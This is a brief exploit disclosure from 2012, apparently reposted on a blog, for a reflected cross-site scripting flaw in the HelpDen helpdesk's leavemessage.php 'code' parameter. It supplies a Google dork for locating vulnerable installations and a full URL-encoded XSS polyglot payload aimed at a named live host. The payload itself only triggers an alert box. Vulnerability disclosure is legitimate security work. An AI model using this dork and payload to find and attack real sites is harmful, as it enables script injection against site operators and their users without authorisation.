# Exploit Title: HelpDen Cross Site Scripting # Date: 15.04.2012 # Author: Sony # Software Link: http://www.helpden.com/ # Google Dorks:inurl:.helpden.com/leavemessage.php?code # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/04/helpden-cross-site-scripting.html ..................................................................
We have a simple xss in HelpDen.
Our xss is here:
https://url_name/leavemessage.php?code=[our xss]
https://admin.helpden.com/leavemessage.php?code=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
or
http://codepad.org/wiyno0Wx
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.